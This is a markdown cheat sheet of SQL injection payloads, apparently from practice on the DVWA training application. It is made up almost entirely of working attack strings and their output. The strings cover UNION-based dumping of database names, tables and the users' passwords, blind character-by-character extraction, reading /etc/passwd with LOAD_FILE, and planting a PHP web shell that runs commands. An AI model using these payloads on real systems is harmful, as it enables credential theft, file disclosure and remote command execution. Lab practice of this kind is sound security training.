sqli.md

User ID: ' OR 1=1 #
User ID: ' OR 1=1 ORDER BY 1 #
User ID: 6' UNION SELECT 1,2 #
First name: 1
Surname: 2
User ID: 6' UNION SELECT database(),current_user() #
First name: dvwa
Surname: dvwa@localhost
User ID: 6' UNION SELECT table_name,2
  FROM INFORMATION_SCHEMA.TABLES
  WHERE TABLE_SCHEMA = 'dvwa' #
User ID: 6' UNION SELECT column_name,2
  FROM INFORMATION_SCHEMA.COLUMNS
  WHERE TABLE_SCHEMA = 'dvwa' #
User ID: 6' UNION SELECT user,password FROM users #
User ID: ' OR 1=1 #
User ID: 1 OR 1=1 #
User ID: 6' ... #
User ID: 6 ... #
User ID: 1
User ID exists in the database.
User ID: 6
User ID is MISSING from the database.
User ID: 1' AND '1' = '2' #
User ID is MISSING from the database.
User ID: 1' AND '1' = '1' #
User ID exists in the database.
1' AND ORD(MID(DATABASE(),1,1)) = 100 #
1' AND LENGTH(DATABASE()) = 4 #
1' AND ORD(MID(DATABASE(),1,1)) = 100 # d
1' AND ORD(MID(DATABASE(),2,1)) = 118 # v
1' AND ORD(MID(DATABASE(),3,1)) = 119 # w
1' AND ORD(MID(DATABASE(),4,1)) = 97  # a
http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, benchmark(5000000, encode('MSG', 'pass-phrase')) FROM users#&Submit=Submit
http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, LOAD_FILE("/etc/passwd")#&Submit=Submit
http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, "<?php system(\$_GET[cmd]) ?>" INTO DUMPFILE "/var/www/dvwa/hackable/uploads/shell.php"#&Submit=Submit
http://dv.wa/hackable/uploads/shell.php?cmd=ls
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
' OR user_id > 0#
1 OR user_id > 0#
1%20OR%20user_id%20%3E%200
http://dv.wa/vulnerabilities/sqli/?id=1%20OR%20user_id%20%3E%200&Submit=Submit